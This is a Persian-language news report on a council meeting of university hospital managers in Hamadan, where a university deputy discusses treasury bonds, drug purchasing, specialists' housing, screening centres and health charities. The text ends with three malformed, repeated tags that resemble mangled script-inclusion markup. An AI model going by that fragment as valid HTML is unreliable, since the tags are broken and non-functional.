جلسه شورای مدیران بیمارستان های دانشگاه استان همدان با حضور معاون توسعه مدیریت و منابع دانشگاه و مدیران و کارشناسان آن حوزه برگزار شد.

مهندس رحیمی ضمن اشاره به استفاده صحیح و اصولی از اوراق خزانه اسلامی اظهار داشت:اوراق خزانه اسلامی و اوراق تسویه در برخی شرایط روند خوب و قابل توجهی را در پرداخت های غیر نقدی ایجاد کند و باید به آن توجه ویژه ای داشت.

معاون توسعه دانشگاه اظهارداشت:تغییر رفتار در روند استفاده از منابع و مصارف موجود باعث می شود شرایط سیستمک دانشگاه با وجود موانعی که در حال گذر از آن هستیم، سامان داده شود و اعتقاد قلبی من بر این اساس است که میتوانیم با درایت و هوشمندی بیشتراز این معبرها به خوبی عبور کنیم.

وی همچنین در ادامه افزود: داروها و ملزومات مصرفی پزشکی حیاتی و استراتژیک با مدیریت درست و اصولی همچنان در اولویت خرید باشد و از خرید بیش از نیاز و انبار داروهای عمومی که در بازار دارو به راحتی یافت می شود جلوگیری شود اما در این میان باید به تاریخ مصرف و نوع استفاده از داروهای اساسی و استراتژیک در بیمارستان ها دقت بیشتری کرد که طبق نیاز و تاریخ مصرف خریداری شود.

وی ضمن اشاره به شرکت های مورد معامله در خرید دارو و ملزومات  با دانشگاه اظهار داشت: در انتخاب و خرید دارو از شرکت های دارویی باید دقت شود چرا که در معامله و بازار کاری فعلی، همکاری و همدلی دو طرف امر بسیار بدیهی است و شرکت هایی که در این شرایط با ما همکاری و همدلی بیشتری داشته باشند باید در اولویت کاری ما قرار گیرند.

معاون توسعه مدیریت و منابع دانشگاه تاکید کرد:مدیران بیمارستان ها باید توجه ویژه ای به محل اقامت و خانه های سازمانی متخصصان داشته باشند و آنان را مورد بررسی قرار دهند و در صورت لزوم امکاناتی که در آن محل مورد نیاز است را تامین کنند چرا که متخصصان دانشگاه سرمایه های درمانی ما هستند.

وی ضمن اشاره به تجهیز کلینیک ها و مراکز غربالگری در سطح استان اظهار داشت: وزارت بهداشت درمان و آموزش پزشکی اقدامات خوبی را برای تامین تجهیزات این مراکز در نظر دارد و به زودی اعتباراتی را در این زمینه برای آنها در نظر خواهیم گرفت.

مهندس رحیمی افزود: باید توجه ویژه ای به ظرفیت و پتانسیل مجمع خیرین سلامت استان داشته باشیم و این مجمع را به عنوان یک فرصت و توان بالقوه درهم افزایی مجموعه های بهداشتی و درمانی بشناسیم. حمایت کامل از این سازمان های مردم نهاد میتواند منجر به بالا رفتن مشارکت اجتماعی و مسئولیت پذیری جامعه شود.

معاون توسعه مدیریت و منابع دانشگاه در پایان تاکید کرد: استفاده از ظرفیت های شهرستانی و استانی در سایه همکاری و هماهنگی همه دستگاه های اجرایی میسر است و در این مسیر، لازم است مجموعه های بهداشتی و درمانی نظیر شبکه های بهداشت و درمان و بیمارستان ها همکاری صمیمانه ای با فرمانداری ها، نمایندگان مجلس شورای اسلامی، شورای اداری شهرها و … را داشته باشند.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>